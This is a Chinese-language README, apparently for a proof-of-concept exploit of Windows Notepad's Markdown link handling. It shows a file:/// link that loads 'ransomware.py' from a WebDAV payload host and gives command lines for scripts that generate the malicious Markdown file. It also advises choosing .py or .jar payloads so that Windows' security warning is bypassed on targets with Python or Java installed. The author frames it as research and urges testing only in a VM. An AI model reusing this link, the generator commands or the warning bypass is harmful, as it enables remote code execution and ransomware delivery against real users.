“Windows 记事本 RCE”漏洞的 PoC。
这个“漏洞”很简单。Windows 记事本的 Markdown 引擎不关心冷门的 URL 协议。作为一名恶意软件分析师,我读过许多关于基于 WebDAV 和 SMB 的载荷部署报告。根据这份文档,可以利用 file:/// 协议创建一个指向 WebDAV/SMB 服务器上文件的 URL。
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)
我制作了两个脚本:一个用 Node.js,另一个用 Python。两者都会创建一个指向 WebDAV 载荷的 Markdown 文件。你可以使用 sample-payloads 文件夹中的示例载荷。
node poc.js <webdav-server> <port> <payload/path/on/server>
python poc.py <webdav-server> <port> <payload/path/on/server>
输出文件(poc.md)将出现在当前目录中。
大多数载荷文件扩展名(例如 .exe、.lnk、.vbs 等)仍然会触发内置警告,尽管记事本应用存在漏洞。这个警告来自 Windows 本身。至少就我所测试的,凡是在默认 OOB 安装上能导致代码执行的载荷,都会显示这个强制警告。

如果目标设备安装了 Python 或 Java,你可以使用 .py 或 .jar 载荷来绕过警告弹窗。

现在点击该链接会显示一个新的警告弹窗。
你可以从 Uptodown 找到存在漏洞的 Windows 记事本版本。记得检查安装程序的数字签名,并确保它来自 Microsoft。此外,你应该只在虚拟机中测试这个 PoC。
注意安全,玩得开心!